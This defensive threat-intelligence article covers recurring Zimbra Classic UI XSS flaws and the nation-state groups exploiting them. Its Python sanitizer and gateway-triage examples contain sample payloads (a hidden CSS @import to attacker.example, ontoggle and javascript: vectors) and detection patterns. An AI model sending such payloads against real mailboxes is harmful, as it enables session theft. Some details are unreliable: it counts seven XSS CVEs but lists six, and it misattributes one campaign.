Zimbra's Persistent XSS Problem: Nation-State Actors and the Classic UI (2022–2026)

Seven Zimbra XSS CVEs across four years — all hitting the same Classic UI HTML sanitizer — exploited by Greek, Belarusian, Russian, Vietnamese, and Pakistani nation-state actors for email intelligence collection. Why the vulnerability keeps recurring, and what the exploitation pattern reveals about webmail as intelligence infrastructure.

Email as Intelligence Infrastructure

Government officials and diplomats use email for everything: internal policy coordination, treaty negotiations, personnel matters, and intelligence assessments. Their inboxes are archives of sensitive decisions made over months and years. A foreign intelligence service does not need to compromise a classified network to collect strategically valuable information — it needs access to the webmail platform.

This is the logic behind the sustained targeting of Zimbra Collaboration Suite. Zimbra is an open-source enterprise email and collaboration platform used by government agencies, military organisations, and diplomatic missions globally. It is particularly prevalent in Eastern European government infrastructure, the Global South, and organisations with tight licensing budgets — making it a recurring fixture in nation-state intelligence collection campaigns.

Since 2022, seven Zimbra cross-site scripting CVEs have reached the CISA Known Exploited Vulnerabilities catalog, all rooted in the same architectural component: the Classic UI HTML rendering engine. Nation-state actors linked to Greece, Belarus, Russia, Vietnam, and Pakistan have each exploited these vulnerabilities — sometimes as zero-days, sometimes against servers that had been patched for months. The recurring vulnerability, the recurring target profile, and the recurring exploitation pattern form one of the clearest illustrations of how a persistent architectural weakness becomes a standing intelligence-collection tool.

What is Zimbra Collaboration Suite?

Zimbra Collaboration Suite (ZCS) is an enterprise email, calendar, and collaboration platform. Organizations deploy it as an on-premises server or hosted service; Zimbra provides the webmail interface, SMTP/IMAP backend, shared calendar, and contacts functionality that users access through their browser.

The relevant architectural division is between two UI modes:

Classic UI is the original Zimbra web client, written in DHTML. It renders email bodies and calendar data in the browser, processing HTML content from incoming messages to display it to the user. The Classic UI is the dominant mode in government and older enterprise deployments — it is the default in many Zimbra configurations.

Modern UI (Iris) is a React-based rewrite introduced in ZCS 8.8. It uses a different rendering pipeline and has a distinct set of vulnerabilities.

Every XSS CVE in this cluster targets the Classic UI. When an attacker exploits these vulnerabilities, they inject JavaScript that executes in the context of the victim's authenticated webmail session — giving them the ability to steal session tokens, read all email, exfiltrate contacts and calendar data, and send email as the victim. The attack is typically zero-click from the victim's perspective: the malicious email arrives in their inbox, and the script executes when they open or preview the message. No phishing prompt, no attachment to open, no link to click.

The Zimbra KEV Cluster: An Overview

Zimbra has accumulated nineteen CVEs in the CISA KEV catalog spanning 2018 to 2026. The cluster divides into two meaningful sub-categories:

Remote code execution and authentication bypass — CVEs like CVE-2022-37042, CVE-2022-41352, and CVE-2024-45519 (CVSS 10.0) that enable an unauthenticated attacker to execute commands directly on the server. These vulnerabilities are operationally high-impact and tend to trigger mass exploitation campaigns.

Classic UI XSS — CVE-2022-24682, CVE-2023-37580, CVE-2024-27443, CVE-2025-27915, CVE-2025-48700, and CVE-2025-66376: a family of stored and reflected cross-site scripting vulnerabilities all rooted in how the Classic UI sanitizes and renders HTML from email bodies and calendar data. These CVSS Medium ratings — typically 5.4 to 6.1 — consistently understate their intelligence value. CVSS models individual vulnerabilities in isolation. It does not model the strategic value of the email inbox as an intelligence target.

The XSS sub-cluster is the subject of this article.

The Pattern, Year by Year

2022 — The First XSS and the Mass Exploitation Baseline

CVE-2022-24682 established the pattern. Added to the CISA KEV catalog in February 2022, it is a stored XSS in the Calendar feature of Zimbra's Classic UI. CISA's ransomware flag on this CVE is notable — it indicates the vulnerability was exploited not only for intelligence collection but also as an initial access vector in ransomware campaigns, confirming that Zimbra exploitation spans the full threat actor spectrum.

The same year produced the most technically severe Zimbra exploitation documented in the KEV catalog. CVE-2022-37042 and CVE-2022-41352 form a two-CVE chain that achieves unauthenticated remote code execution without any user interaction.

CVE-2022-41352 exploits a loophole in how Zimbra's antivirus component — amavis — processes email attachments. When amavis receives an email containing a cpio archive, it extracts the archive's contents for scanning. Zimbra's extraction path is /opt/zimbra/jetty/webapps/zimbra/public — which is also the Zimbra web root, directly accessible via HTTP. An attacker emails a crafted cpio archive containing a JSP webshell; amavis extracts it to the web root; the attacker immediately accesses the webshell over HTTP without ever authenticating to the Zimbra interface. CVE-2022-37042 is the authentication bypass that removed the credential check the mboximport upload endpoint had previously enforced — making the full chain work even on configurations where direct cpio upload would have required credentials.

Volexity documented mass exploitation of this chain against more than 1,000 ZCS instances globally in October 2022, making it one of the largest confirmed Zimbra mass-exploitation events on record.

The two sub-clusters — XSS for intelligence collection, RCE for direct compromise — ran simultaneously in 2022, establishing Zimbra as a dual-use target: email platform for intelligence access, server for persistent footholds.

2023 — Google TAG Catches Four Nation-State Groups in a Single Zero-Day

CVE-2023-37580 is the best-documented case of Zimbra XSS as a nation-state tool. Google's Threat Analysis Group (TAG) attributed exploitation of this reflected XSS vulnerability to four distinct nation-state actors over a ten-week window — each operating independently, with separate targeting packages.

The timeline reveals the sophistication of the campaign:

  • June 29, 2023 — A group linked to Greece began exploitation before Zimbra publicly disclosed the vulnerability — a confirmed zero-day window. Targeting focused on Greek government officials' webmail accounts.
  • July 2023 — Winter Vivern (also tracked as UAC-0114, attributed to Belarusian intelligence) began exploiting the same zero-day, targeting government webmail accounts in Moldova and Tunisia.
  • July 20, 2023 — A group with Vietnam-nexus indicators began exploitation.
  • August 25, 2023 — A group with Pakistan-nexus indicators began exploitation. This was after the official patch release on July 25 — demonstrating that the group either derived a proof of concept from analysis of the patch diff or observed the earlier actors' techniques and adapted them after the fact.

CISA added CVE-2023-37580 to the KEV catalog on July 27, 2023 — two days after the official Zimbra patch release on July 25 — acting on exploitation evidence accumulated across the preceding four weeks of active zero-day abuse.

The Google TAG finding — four separate intelligence operations exploiting a single webmail XSS zero-day, against government targets across three continents, in parallel — illustrates precisely why email platforms warrant disproportionate defender attention relative to their CVSS scores. The vulnerability itself is rated 6.1. The intelligence yield from access to a government official's inbox for weeks or months is incalculable.

2024 — ICS Calendar Injection and the CVSS 10.0 Command Execution

CVE-2024-27443 continued the pattern into 2024, introducing a new injection vector: ICS calendar files. Calendar invitations in the iCalendar (.ics) format are processed by Zimbra and rendered in the browser through the same Classic UI pipeline as email HTML. CVE-2024-27443 exploits insufficient sanitization of content within ICS file fields — allowing an attacker to embed malicious HTML that executes when the recipient opens or previews the calendar invitation in the Classic UI. The attack surface expands beyond email bodies: any message type that passes through the Classic UI rendering engine, including calendar data from external sources, becomes a potential injection point.

The same year produced the most severe Zimbra vulnerability in recent years: CVE-2024-45519, a CVSS 10.0 unauthenticated command execution vulnerability in the postjournal service. Unlike the XSS cluster, CVE-2024-45519 requires no user interaction and no established session — an attacker sends a crafted network request to the postjournal service and achieves operating-system-level command execution with no credentials. The fact that Zimbra reached CVSS 10.0 for server-side command execution within the same product line that is simultaneously being exploited for client-side intelligence collection illustrates the breadth of the attack surface: nation-state actors harvesting email sessions and opportunistic attackers deploying webshells and ransomware are hitting different entry points of the same platform simultaneously.

2025–2026 — CSS @import Becomes the New Attack Vector

The three most recent Zimbra XSS CVEs in the catalog — CVE-2025-27915, CVE-2025-48700, and CVE-2025-66376 — share a technical theme: attackers found that CSS injection bypasses sanitization checks that were specifically written to block JavaScript.

CVE-2025-27915 exploits HTML tag injection within ICS calendar data. An attacker crafts a calendar invitation containing a <details> HTML element with an ontoggle event handler. When the Classic UI renders the invitation and the user interacts with it (or when the browser auto-triggers the event during rendering), the JavaScript payload executes. Security firm attribution linked confirmed exploitation of CVE-2025-27915 to UNC1151/Ghostwriter — a Belarusian intelligence-linked threat group previously associated with information operations campaigns — targeting Brazilian military and government email accounts. UNC1151's pivot from European government targets (CVE-2023-37580 Moldova/Tunisia) to Brazilian military accounts reflects an expanding operational mandate.

CVE-2025-66376 and CVE-2025-48700 represent the CSS @import generation of Zimbra XSS exploitation. Both vulnerabilities exploit the same mechanism: the Classic UI's HTML sanitizer correctly strips <script> tags and inline JavaScript event handlers, but allows <style> blocks containing CSS. An attacker constructs an email whose HTML body includes a CSS @import directive pointing to an attacker-controlled external stylesheet. When the Classic UI renders the email, the browser fetches and applies the external stylesheet — which can itself contain CSS url() directives that exfiltrate the authenticated session's CSRF token (stolen from the page's DOM or localStorage) as URL parameters to an attacker-controlled server.

CVE-2025-66376 was exploited in what researchers dubbed Operation GhostMail, attributed to APT28 (Fancy Bear — Russian GRU military intelligence). The campaign targeted Ukrainian government and military email accounts. APT28's implementation concealed the @import directive inside a <div style="display:none"> element to reduce visibility in email previews. The CSRF token exfiltration used both DNS and HTTPS channels, providing redundancy in restricted network environments. The Finnish National Cyber Security Centre (NCSC-FI) discovered and reported the campaign; CISA added CVE-2025-66376 to the KEV catalog on March 18, 2026.

CVE-2025-48700 uses the same @import mechanism and was added to CISA's KEV catalog in April 2026 with a three-day remediation deadline — reflecting CISA's assessment of active exploitation urgency. The juxtaposition of CVE-2025-66376 (Russian intelligence targeting Ukraine) and CVE-2025-48700 (separate actors, separate KEV addition) within weeks of each other indicates that the @import bypass technique had been discovered and operationalised by multiple threat actors simultaneously — consistent with either independent discovery or technique sharing.

Why the HTML Sanitizer Keeps Failing

Seven XSS CVEs across four years, each requiring a new patch, suggest not a series of discrete bugs but a structural difficulty in the sanitization problem itself.

HTML is a context-sensitive parsing problem. A browser's HTML parser is designed to be maximally forgiving — it will construct a valid DOM from almost any malformed input. A sanitizer, by contrast, must anticipate every context in which an attacker could inject executable code, including contexts the sanitizer authors did not model when writing the allowlists. Every HTML attribute that accepts a URL is a potential JavaScript vector (href="javascript:...", src="data:text/html,...", action="..."). Every CSS property that triggers a network request is a potential exfiltration channel (background-image: url(...), @import).

Multiple injection surfaces with different processing pipelines. Email HTML bodies, ICS calendar fields, and HTML-formatted contact notes all flow through different code paths before reaching the Classic UI renderer. Each processing pipeline has its own sanitization logic, and each has independently failed. CVE-2022-24682 hit email HTML; CVE-2024-27443 and CVE-2025-27915 hit ICS calendar data; CVE-2025-48700 and CVE-2025-66376 hit email HTML again with a different bypass technique. Patching one path does not guarantee the others are correct.

CSS was not treated as executable. The <style> block and inline CSS that triggered CVE-2025-66376 and CVE-2025-48700 were being permitted because CSS appears to be presentation-only. But CSS @import and url() directives cause the browser to make external network requests — which means an attacker controlling an external server can receive the user's session token as a URL parameter. Allowing arbitrary CSS in email HTML creates a side-channel even when JavaScript is fully blocked.

The Classic UI's age. The Classic UI codebase is over fifteen years old and predates modern sanitization frameworks like DOMPurify. Its sanitization logic has been extended piecemeal rather than rebuilt from a principled allowlist model, accumulating bypass opportunities as the HTML specification expanded.
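To make the denylist-versus-allowlist distinction concrete, here is an added Python illustration (not Zimbra's Classic UI code): a piecemeal sanitizer that strips <script> blocks and on* handlers, beside an allowlist rebuild that also drops <style>, the style attribute and non-http(s) href schemes. The four sample inputs and the marker list are constructed for the illustration and shaped like the vectors described above.

```python
import html
import re
from html.parser import HTMLParser

SAMPLES = {  # constructed inputs shaped like the vectors named in the article
    "script": "<p>hi</p><script>alert(1)</script>",
    "handler": '<details ontoggle="alert(1)" open><summary>x</summary></details>',
    "css_import": '<div style="display:none"><style>@import url("https://attacker.example/a.css");</style></div>',
    "js_url": '<a href="javascript:alert(1)">link</a>',
}
DANGER_MARKERS = ("<script", "ontoggle", "@import", "javascript:")

def denylist_sanitize(doc):
    """Piecemeal approach: strip <script> blocks and on* handlers, pass everything else through."""
    doc = re.sub(r"<script\b.*?</script>", "", doc, flags=re.I | re.S)
    return re.sub(r"""\son\w+\s*=\s*("[^"]*"|'[^']*'|\S+)""", "", doc, flags=re.I)

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "div", "span", "ul", "ol", "li"}
ALLOWED_ATTRS = {"href", "title"}          # no style attribute: CSS is a fetch vector, not decoration
SAFE_SCHEMES = ("http:", "https:", "mailto:")

class AllowlistSanitizer(HTMLParser):
    """Principled approach: rebuild the document from an allowlist instead of patching a denylist."""
    def __init__(self):
        super().__init__()
        self.out, self.skip = [], 0        # skip > 0 while inside <style>/<script>; their text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("style", "script"):
            self.skip += 1
        elif tag in ALLOWED_TAGS and not self.skip:
            kept = "".join(f' {n}="{html.escape(v, quote=True)}"' for n, v in attrs
                           if n in ALLOWED_ATTRS and v is not None
                           and (n != "href" or v.strip().lower().startswith(SAFE_SCHEMES)))
            self.out.append(f"<{tag}{kept}>")

    def handle_startendtag(self, tag, attrs):   # <br/> must not emit a closing tag
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ("style", "script"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and not self.skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

def allowlist_sanitize(doc):
    p = AllowlistSanitizer()
    p.feed(doc)
    p.close()
    return "".join(p.out)

def survivors(output):
    """Dangerous markers still present after sanitization (case-insensitive)."""
    low = output.lower()
    return tuple(m for m in DANGER_MARKERS if m in low)

def compare():
    """{sample: (markers surviving the denylist, markers surviving the allowlist)}"""
    return {n: (survivors(denylist_sanitize(s)), survivors(allowlist_sanitize(s)))
            for n, s in SAMPLES.items()}
```

The denylist catches exactly what it was written for (the script block and the ontoggle handler) and lets the @import and javascript: cases through untouched; the allowlist never had to know about either.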

Who Is Attacking

Confirmed and attributed threat actors across the Zimbra KEV cluster:

| Threat Actor | CVEs | Attribution | Targeting |
|---|---|---|---|
| Greece-linked group (unnamed) | CVE-2023-37580 (zero-day) | Google TAG | Greek government officials' webmail |
| Winter Vivern / UAC-0114 (Belarus) | CVE-2023-37580 (zero-day) | Google TAG | Moldova and Tunisia government webmail |
| Vietnam-nexus group (unattributed) | CVE-2023-37580 | Google TAG | Government targets |
| Pakistan-nexus group (unattributed) | CVE-2023-37580 (post-patch) | Google TAG | Government targets |
| UNC1151 / Ghostwriter (Belarus) | CVE-2025-27915 | Security researchers | Brazilian military and government |
| APT28 / Fancy Bear (Russian GRU) | CVE-2025-66376 | NCSC-FI; Operation GhostMail | Ukrainian government and military |
| Multiple actors (unattributed) | CVE-2025-48700 | CISA (active exploitation) | Not publicly disclosed |
| Ransomware actors | CVE-2022-24682 | CISA KEV ransomware flag | Enterprise and government |
| Mass exploitation campaigns | CVE-2022-37042, CVE-2022-41352 | Volexity | >1,000 ZCS instances globally |

Two observations about this table stand out. First, the same Classic UI has been independently exploited by intelligence services from at least five countries across four years — each finding or adopting the same technique for the same reason: government email is the target. Second, the Belarus attribution appears twice (Winter Vivern in CVE-2023-37580, UNC1151 in CVE-2025-27915), suggesting that Belarusian intelligence services have maintained sustained operational interest in Zimbra as an intelligence collection platform.

What Defenders Must Do

The XSS vulnerabilities in this cluster are not individually catastrophic in the way that a CVSS 10.0 command execution is. They are precisely targeted, low-noise attacks that produce high-value intelligence access with minimal forensic footprint. Defending against them requires a different posture than defending against mass exploitation events.

  1. Patch immediately, with a short SLA. Every XSS in this cluster required a victim to open a malicious email in the Classic UI — but that is the normal operation of a webmail platform. There is no behavioral detection that distinguishes a legitimate email open from a malicious one; the only mitigation is preventing the exploit from running. Treat Zimbra XSS patches as equivalent priority to authentication bypass patches. Apply within 24–48 hours of release for any internet-accessible instance.

  2. Verify the installed ZCS patch level is current. Zimbra's update cycle for ZCS patches is separate from OS-level patching. Confirm that the installed ZCS version includes the current security patch bundle via the Zimbra administration console or zmcontrol status. Organizations using Zimbra Network Edition should verify patch availability with their vendor; open-source community editions require manual package updates.

  3. Restrict CSS rendering in the Classic UI if operationally possible. Some Zimbra configurations allow administrators to restrict the HTML features rendered in the Classic UI. Disabling or restricting <style> block and inline CSS processing in email rendering eliminates the @import attack vector documented in CVE-2025-48700 and CVE-2025-66376 — at the cost of email formatting fidelity.

  4. Migrate high-value users to the Modern UI (Iris). All confirmed XSS exploitation in this cluster targets the Classic UI. Zimbra's Modern UI (Iris) uses a different rendering pipeline and has not appeared in this CVE cluster. For government users, diplomatic staff, and executives whose email archives are high-intelligence-value targets, the Modern UI represents a meaningful attack surface reduction. Classic UI can be disabled per-user or per-domain in ZCS configuration.

  5. Restrict ICS calendar invitation processing from external senders. CVE-2024-27443 and CVE-2025-27915 exploited calendar invitation injection. Organizations that do not require external senders to place items directly on internal calendars should consider disabling automatic calendar invite processing from non-domain senders, or routing external invitations through a separate review step.

  6. Monitor for anomalous authenticated webmail activity following suspicious email receipt. XSS session theft does not generate failed authentication events — the attacker inherits a valid session. Look for authenticated API calls to unusual endpoints, bulk email access via webmail API (suggesting mass archiving), or contact-export operations immediately following receipt of email from external senders. Email gateways should log the receipt of messages containing <style> blocks with CSS @import directives pointing to external domains.

  7. Do not expose Zimbra Admin Console (port 7071) to the internet. Several Zimbra critical CVEs (including the postjournal chain) require or benefit from access to management-plane services. Restrict all administrative interfaces to VPN-only access from administrator networks. Zimbra webmail (port 443) and SMTP/IMAP (ports 25, 587, 993) should be treated as the only externally accessible services.
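As an added illustration of the gateway logging in item 6 (not Zimbra's or any vendor's code), this Python triage function scans a raw message for the shapes described in this article: CSS @import/url() fetches to hosts outside an assumed internal list, HTML tags inside ICS text fields, and inline on* event handlers. INTERNAL_HOSTS, the host names and the three sample messages are constructed assumptions.

```python
# Gateway-side triage for the injection shapes this article names; constructed samples, not vendor code.
import re
from email import message_from_string, policy

INTERNAL_HOSTS = {"mail.example.gov"}  # assumption: hosts whose stylesheets are expected in mail

CSS_FETCH = re.compile(r"(?:@import\s*(?:url\()?|url\()\s*[\"']?\s*(https?:)?//([^/\"')\s]+)", re.I)  # group 2 = host
EVENT_HANDLER = re.compile(r"<\w+[^>]*\son\w+\s*=", re.I)                      # e.g. <details ontoggle=
ICS_HTML = re.compile(r"^(?:DESCRIPTION|SUMMARY|LOCATION|X-ALT-DESC)[^:]*:.*<[a-z!/]", re.I | re.M)

def triage(raw):
    """Return [(finding, detail), ...] for one RFC 5322 message; an empty list means nothing flagged."""
    findings = []
    for part in message_from_string(raw, policy=policy.default).walk():
        ctype = part.get_content_type()
        if ctype not in ("text/html", "text/calendar"):
            continue
        body = part.get_content()
        if ctype == "text/html":
            for m in CSS_FETCH.finditer(body):
                if m.group(2).lower() not in INTERNAL_HOSTS:
                    findings.append(("css-external-fetch", m.group(2).lower()))
        else:
            for m in ICS_HTML.finditer(body):
                findings.append(("html-in-ics-field", m.group(0)[:40]))
        for m in EVENT_HANDLER.finditer(body):
            findings.append(("inline-event-handler", m.group(0)))
    return findings

SAMPLES = {  # constructed messages shaped like the article's vectors
    "ghostmail_shape": """\
From: sender@external.example
To: official@mail.example.gov
Content-Type: text/html; charset="utf-8"

<html><body><p>Please see the agenda.</p>
<div style="display:none"><style>@import url("https://cdn.attacker.example/a.css");</style></div>
</body></html>
""",
    "ics_shape": """\
From: sender@external.example
To: official@mail.example.gov
Content-Type: text/calendar; charset="utf-8"; method=REQUEST

BEGIN:VCALENDAR
BEGIN:VEVENT
SUMMARY:Budget review
DESCRIPTION:See <details ontoggle=alert(1)>agenda</details>
END:VEVENT
END:VCALENDAR
""",
    "benign": """\
From: colleague@mail.example.gov
To: official@mail.example.gov
Content-Type: text/html; charset="utf-8"

<html><body><p style="color:#333">Noon?</p>
<style>@import url("https://mail.example.gov/brand.css");</style></body></html>
""",
}

def triage_all():
    """{sample name: [finding names]} in the order they were raised."""
    return {name: [f for f, _ in triage(raw)] for name, raw in SAMPLES.items()}
```

The benign sample shows why the internal-host allowlist matters: an @import to the organisation's own host is normal branding, and logging it would bury the external fetches the article describes.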

The Structural Problem

The Zimbra XSS cluster is not a series of independent bugs discovered by different researchers over four years. It is a single recurring failure: a legacy HTML rendering engine that cannot reliably distinguish attacker-controlled HTML from legitimate email formatting, in a product deployed by exactly the organisations that foreign intelligence services most want to surveil.

The CVSS scores — 5.4 to 6.1 across the XSS cluster — reflect the vulnerability's individual technical properties. They do not reflect the strategic value of the target population, the zero-click delivery mechanism, the low forensic footprint, or the compounding effect of access to months of archived government correspondence. Nation-state actors have consistently assessed this vulnerability class as worth sustained investment, returning to the same attack surface across four years with progressively refined bypass techniques.

Defenders serving government organisations, diplomatic missions, or any institution whose email carries sensitive operational data should treat Zimbra XSS patches as critical regardless of their CVSS score, and should regard Classic UI exposure to the public internet as a standing intelligence risk — not a conditional one.